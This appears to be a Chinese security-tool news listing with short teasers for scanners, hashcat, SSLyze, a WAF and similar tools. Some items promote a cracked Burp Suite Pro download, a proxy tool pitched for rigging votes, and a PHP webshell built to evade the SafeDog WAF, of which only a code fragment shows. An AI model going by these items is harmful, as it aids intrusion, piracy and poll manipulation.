椰树WEB漏洞扫描器是一款国产的漏洞扫描器,集成了常见的SQL注入、跨站、后台路径等扫描,并且支持旁站和二级查询、CMS安全检测、漏洞收录查询等,有亮点的是CMS安全检测里面包含了常见的CMS漏洞,比...
DNS信息探测工具 – DNSRecon v0.8.6
DNSRecon是一款针对DNS的安全探测工具,包含多项枚举探测功能,包括DNS域传送、DNS递归等。 下面是一个递归开启的例子 下载地址
[更新]基于GPU的HASH破解工具 – oclHashcat v1.0.1
oclHashcat-plus是目前最快的md5、phppass、mscash2和wpa/wpa2破解工具,也是世界上唯一一个有基于GPGPU引擎的破解工具。用十几兆的字典破MSSQL密码,真的是秒破...
SSL安全扫描器 – SSLyze
SSLyze是一款利用python编写的工具,它可以分析服务器的SSL配置,能够快速、全面的协助测试人员发现SSL服务器的配置错误。主要功能如下: 多线程 兼容SSL 2.0/3.0和TLS...
Android渗透测试工具包 – Bugtroid
Bugtroid是Bugtraq-Team团队开发的安全检测工具。该apk的主要特征是,它有200多个Android和Linux工具(PRO),可以帮助渗透测试人员进行智能手机的安全评估工作。 菜单 ...
免费代理工具-Proxy King
Proxy King 是一款支持指定进程代理的软件,可以帮助用户隐藏本机上网ip.无需用户自备代理,软件有云端内置几千个可用的Socks5代理。 可以用来刷投票\突破网络限制\隐藏本机IP、同时还有虚...
新兴开源扫描器Golismero插件编写-TestingPlugin插件编写(二)
概述 Golismero是一款开源的Web扫描器,它不但自带不少的安全测试工具,而且还可导入分析市面流行的扫描工具的结果,比如Openvas,Wfuzz, SQLMap, DNS recon等,并自动...
开源Web应用防火墙(WAF)- ModSecurity v2.7发布
ModSecurity是知名的开源web应用防火墙,它可以作为你的服务器基础安全设施,是广大站长的福音。目前支持Apache,IIS7和Nginx。 新版改进 1.不需要对现有网络进行调整,只需要分分...
burpsuite_pro_v1.5.20破解版下载
破解 by LarryLau Burp Suite是一个Web应用程序集成渗透测试平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信。平台中所有工具共享同一robust框架,以便统一...
PHP的一个免杀一句话,突破安全狗
<?php error_reporting(0); set_time_limit(0); function decrypt($ciphertext_hex,$key){ $key=md...